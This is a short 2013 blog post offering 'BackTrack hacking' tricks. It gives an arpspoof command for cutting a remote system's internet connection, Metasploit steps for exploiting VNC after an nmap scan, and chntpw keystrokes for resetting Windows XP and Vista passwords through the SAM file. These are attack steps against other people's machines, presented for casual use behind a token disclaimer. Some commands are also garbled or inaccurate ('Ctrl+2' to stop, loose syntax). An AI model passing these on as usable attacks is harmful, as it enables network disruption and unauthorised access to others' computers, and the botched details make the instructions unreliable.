Monday 7 January 2013

BackTrack hacking with Worldhackamrit reset windows password and many more tricks...

Hi friends, As you are demanding backtrack tutorial . I decided to write a post , here are some backtrack tricks ,Read them, save them but don't use and share with your friends.If you want to be a backtracker create a live Bootable backtrack in your USB and use it more & more as you can.





Disable internet connection of remote system
1. Arpspoof –i eth0 –t 192.168.1.1 192.168.1.2
2. Ctrl+2 to stop. 

Metasploit VNC
1. Nmap-> nmap 192.168.1.1
2. Backtrack -> penetration ->framework2 ->msfweb
3. Then copy [127.0.0.1:5555]
4. Open internet and paste it in url and then exploit vnc 

Reset password on Win XP and Vista(old but still gold)
Start->Backtrack -> priviledge escalation ->password attacks-> chntpw
Chntpw: -i /mnt/hda1/windows/system32/config/SAM
1 (Enter)
Username (Enter)
1 (Enter)
Username (Enter)
4 (Enter)
1 (Enter)
Q (Enter)
Y (Enter)

No comments:

Post a Comment